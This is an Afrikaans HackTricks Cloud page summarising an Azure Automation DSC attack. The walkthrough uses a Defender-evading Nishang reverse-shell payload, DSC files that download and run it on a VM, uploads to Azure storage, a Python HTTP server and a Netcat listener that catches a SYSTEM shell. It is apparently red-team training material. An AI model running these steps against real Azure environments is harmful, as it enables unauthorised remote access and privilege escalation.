Az - State Configuration RCE

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Kyk na die volledige pos in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Samevatting van Afgeleë Bediener (C2) Infrastruktuur Voorbereiding en Stappe

Oorsig

Die proses behels die opstelling van 'n afgeleë bediener infrastruktuur om 'n gewysigde Nishang Invoke-PowerShellTcp.ps1 payload, genaamd RevPS.ps1, te huisves, wat ontwerp is om Windows Defender te omseil. Die payload word bedien vanaf 'n Kali Linux masjien met IP 40.84.7.74 met behulp van 'n eenvoudige Python HTTP bediener. Die operasie word deur verskeie stappe uitgevoer:

Stap 1 — Skep Lêers

Benodigde Lêers: Twee PowerShell skripte is nodig:

reverse_shell_config.ps1: 'n Gewensde Standaard Konfigurasie (DSC) lêer wat die payload aflaai en uitvoer. Dit is verkrygbaar van GitHub.
push_reverse_shell_config.ps1: 'n skrip om die konfigurasie na die VM te publiseer, beskikbaar op GitHub.

Aangepas: Veranderlikes en parameters in hierdie lêers moet aangepas word vir die gebruiker se spesifieke omgewing, insluitend hulpbronname, lêerpaaie, en bediener/payload identifiseerders.

Stap 2 — Zip Konfigurasie Lêer

Die reverse_shell_config.ps1 word gecomprimeer in 'n .zip lêer, wat dit gereed maak vir oordrag na die Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Stap 3 — Stel Bergingskonteks in & Laai op

Die gecomprimeerde konfigurasie-lêer word na 'n vooraf gedefinieerde Azure Bergingshouer, azure-pentest, opgelaai met behulp van Azure se Set-AzStorageBlobContent cmdlet.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Stap 4 — Berei Kali Box Voor

Die Kali-bediener laai die RevPS.ps1 payload af van 'n GitHub-bewaarplek.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Die skrip is gewysig om die teiken Windows VM en poort vir die omgekeerde skulp te spesifiseer.

Stap 5 — Publiseer Konfigurasie Lêer

Die konfigurasie lêer word uitgevoer, wat lei tot die ontplooiing van die omgekeerde-skulpskrip na die gespesifiseerde ligging op die Windows VM.

Stap 6 — Gasheer Payload en Stel Luisteraar Op

'n Python SimpleHTTPServer word begin om die payload te gasheer, saam met 'n Netcat luisteraar om inkomende verbindings te vang.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Die geskeduleerde taak voer die payload uit, wat SYSTEM-vlak voorregte bereik.

Gevolgtrekking

Die suksesvolle uitvoering van hierdie proses open talle moontlikhede vir verdere aksies, soos kredensiaal dumping of die uitbreiding van die aanval na verskeie VM's. Die gids moedig voortgesette leer en kreatiwiteit in die gebied van Azure Automation DSC aan.

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PR's in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 3 days ago